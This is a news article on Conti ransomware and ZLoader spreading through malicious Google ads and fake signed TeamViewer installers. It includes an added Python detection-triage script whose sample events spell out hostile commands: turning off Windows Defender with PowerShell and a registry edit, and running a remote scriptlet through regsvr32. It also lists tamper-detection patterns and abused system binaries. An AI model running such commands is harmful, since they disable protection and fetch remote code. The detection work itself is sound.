The U.S. government and the tech industry are warning of an increase in the use of Conti ransomware, which has been used in more than 400 attacks on U.S. and international organizations, including healthcare providers, first responders and other critical organizations.
The Cybersecurity and Infrastructure Security Agency released an advisory this week, and Microsoft and Sentinel Labs also released information about the increased use of Conti ransomware, which is being downloaded through a Google advertisement published through Google AdWords.
Threat actors are leveraging ZLoader, a banking trojan first discovered in 2016, to distribute the malware. According to Sentinel Labs, ZLoader implements web injection to steal cookies, passwords and sensitive information, provides backdoor capabilities and acts as a generic loader for other forms of malware.
“Newer versions implement a VNC module which permits users to open a hidden channel that gives the operators remote access to victim systems,” according to a Sentinel Labs report. “ZLoader relies primarily on dynamic data exchange (DDE) and macro obfuscation to deliver the final payload through crafted documents.”
The cybersecurity firm further says the infection chain has evolved to include the dynamic creation of agents which download the payload from a remote server.
“The new infection chain observed by Sentinel Labs demonstrates a higher level of stealth by disabling Windows Defender and relying on living-off-the-land binaries and scripts (LOLBAS) in order to evade detection,” the company said. “During our investigation, we were also able to map all the new ZLoader C2 infrastructure related to the ‘Tim’ botnet and identify the scope of the campaign and its objectives, which primarily involved stealing bank credentials from customers of European banks.”
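The Sentinel Labs description above gives defenders a concrete set of behaviours to hunt for: an installer spawning a shell, that shell turning off Windows Defender, and LOLBAS binaries fetching content from a remote server. The following Python script is an added example written for this page, not code from the article, Sentinel Labs or Microsoft. It runs simple triage logic over a handful of constructed process-creation events (the field names mimic a generic Sysmon/EDR export and the events are invented for illustration). The article names no specific commands, so the Defender-tampering patterns below are generic, well-known Defender settings (`Set-MpPreference`, the `DisableAntiSpyware` policy value) used as an assumption of what such a chain might look like, not indicators taken from the campaign.

```python
import re
from typing import Dict, List

# Constructed sample events (NOT from the article). Each mimics one
# process-creation record: parent image, child image, full command line.
SAMPLE_EVENTS = [
    {"parent": "msiexec.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"parent": "msiexec.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
                '/v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"parent": "cmd.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /i:http://example.invalid/payload.sct scrobj.dll"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"parent": "svchost.exe", "image": "MsMpEng.exe", "cmdline": "MsMpEng.exe"},
]

# Generic Defender-tampering patterns (assumption: real Defender settings,
# but the article does not say which ones the campaign touched).
DEFENDER_TAMPER = [
    re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    re.compile(r"Windows Defender.*DisableAntiSpyware", re.I),
]

# Signed Windows binaries commonly abused as living-off-the-land tools.
LOLBAS = {"regsvr32.exe", "mshta.exe", "rundll32.exe", "certutil.exe",
          "wscript.exe", "cscript.exe", "bitsadmin.exe"}

INSTALLER_PARENTS = {"msiexec.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}


def tag_event(event: Dict[str, str]) -> List[str]:
    """Return the sorted list of triage tags that apply to one event."""
    tags = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmdline = event["cmdline"]

    # Installer package (e.g. a fake signed MSI) launching a shell.
    if parent in INSTALLER_PARENTS and image in SHELLS:
        tags.append("installer_spawned_shell")

    # Command line that weakens or disables Windows Defender.
    if any(p.search(cmdline) for p in DEFENDER_TAMPER):
        tags.append("defender_tamper")

    # LOLBAS binary given a remote (http/https) source to pull from.
    if image in LOLBAS and re.search(r"https?://", cmdline, re.I):
        tags.append("lolbas_remote")

    return sorted(tags)


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> tags, keeping only events that raised at least one tag."""
    findings = {}
    for idx, event in enumerate(events):
        tags = tag_event(event)
        if tags:
            findings[idx] = tags
    return findings


if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(tags)}  <- {SAMPLE_EVENTS[idx]['cmdline']}")
```

The three tags are deliberately independent: a single event carrying both `installer_spawned_shell` and `defender_tamper` is a much stronger signal than either alone, which is the kind of correlation a detection engineer would build on top of raw process telemetry rather than alerting on any one LOLBAS invocation.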
In this campaign, a user does a Google search to find a website from which to download software. In one case, a user searched for a legitimate TeamViewer download but clicked an advertisement shown by Google and was redirected to a fake TeamViewer site under the attacker’s control, according to Sentinel Labs.
The user is then tricked into downloading the fake software, packaged as a signed MSI.
The Microsoft Security Intelligence Twitter account has further details on this attack:
While analyzing ZLoader campaigns in early September, we observed a notable shift in delivery method: from the traditional email campaigns to the abuse of online ad platforms. Attackers purchased ads pointing to websites that host malware posing as legitimate installers. pic.twitter.com/8HkR4kmyO6
— Microsoft Security Intelligence (@MsftSecIntel) September 23, 2021